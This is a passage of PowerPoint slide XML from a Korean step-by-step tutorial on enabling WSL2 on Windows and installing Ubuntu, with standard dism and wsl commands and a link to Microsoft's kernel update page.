              <a:t>.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.exe /online /enable-feature /featurename:VirtualMachinePlatform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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5. 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업이 완료되었다면 설정을 적용하기 위해 컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>재부팅 후 마이크로소프트 스토어를 켜서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>우분투를 설치해준다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설치가 완료되면 스토어에서 실행 버튼을 누른다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“Installing, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>may take a few minutes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>…” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 줄이 나올 때 까지 기다린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF1763B-0B00-4D2E-A132-5814BD8D8D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698632" y="938784"/>
            <a:ext cx="2574664" cy="2735580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4595BD3-7D0D-490B-B773-C065B3EDF894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="949071" y="4457817"/>
            <a:ext cx="3836289" cy="1890595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CAE49D-319D-4B77-9EA6-A54E73A894E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356521" y="1161355"/>
            <a:ext cx="5231120" cy="1206173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FC8342-6507-4822-BF14-ECF2A18436B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356520" y="2576338"/>
            <a:ext cx="5231119" cy="1527015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F01FCDDF-6EEA-4443-B550-046EC016CF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949070" y="4877035"/>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A44303A4-1256-4FCA-9022-DF871E2A6DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949069" y="5528297"/>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EC9306F8-0CD3-4D9E-9461-769A6DC8B4D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9764724" y="1455769"/>
            <a:ext cx="1467043" cy="292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14BCCD89-2C3E-4CA5-A6BE-F9238C6AADA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178540" y="3158773"/>
            <a:ext cx="1058565" cy="270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97B1EDFD-B47A-4168-B98D-8252C239C48B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356520" y="4832767"/>
            <a:ext cx="5231119" cy="1434199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B67FD0CC-4F0B-46E1-9C63-0FBD15EFBF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178540" y="5258310"/>
            <a:ext cx="923963" cy="214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71189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Username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 입력하라는 메시지가 출력된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>새로 설치할 우분투의 사용자명과 비밀번호를 여기서 설정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기존 윈도우의 계정이름</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비밀번호와 똑같이 할 필요는 없다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기억하기 어려우면 똑같이 해도 됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</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9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정이 완료되면 이 창을 닫고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 관리자 권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 실행시킨다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 쳤을 때 다음과 같은 화면이 나오면 정상적으로 설치가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>완료된것</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10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력하여 터미널로 나가준다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 명령어를 입력하여  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버전을 확인한다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–l -v</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12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 페이지에서 커널 업데이트 패키지를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>각 운영체제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 맞는 패키지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Docs.Microsoft.com/ko-KR/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/wsl2-kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans KR"/>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13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운받은 커널 패키지를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3" name="그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA3B15B1-8494-46AD-96E2-32AE76C7A922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="543338" y="1065443"/>
            <a:ext cx="5314359" cy="1210523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418B2E22-9D53-4183-8534-25F7FC65F038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="543338" y="3100898"/>
            <a:ext cx="5314359" cy="1483632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA813AC3-D9C1-4105-9CBE-513605A26F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561797" y="5180862"/>
            <a:ext cx="5295900" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51AB68B4-7795-47CF-9DBF-2C3F4524BED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561797" y="5565073"/>
            <a:ext cx="5314359" cy="462325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{783AF243-536B-44BA-A673-E5717ECB0A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329057" y="872083"/>
            <a:ext cx="5266209" cy="1076857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF195253-183B-407A-AE9D-FA6E43A6BA7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329057" y="2611207"/>
            <a:ext cx="5325056" cy="1827923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="그림 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A0D0F15-D871-489C-AF19-A37DE5DF06E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6552360" y="4928821"/>
            <a:ext cx="1763145" cy="1370542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="직사각형 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C6024A-3F30-4CFF-AFDA-EA91E4F4564D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629864" y="1501852"/>
            <a:ext cx="799637"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9DA46569-825A-4F86-BCF9-1C3DB30F3D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614051" y="5210736"/>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A69D648F-38CA-4347-B311-18F1F9E3CAD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329057" y="1070984"/>
            <a:ext cx="1353238" cy="137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89DC93-CD73-488C-88B9-F96536A60B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679499" y="3100898"/>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1698C9F9-873B-4072-9688-4B1A005A93B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7623934" y="6140902"/>
            <a:ext cx="39379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오른쪽 17">
            <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6786EA8-EF5F-40E5-951C-642230DFF24C}"/>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878718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14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 명령어를 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버전을 바꾸어 준다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–set-version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 2</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15. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변환이 완료되었다면 다음 명령어를 통해 다시 버전을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16. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
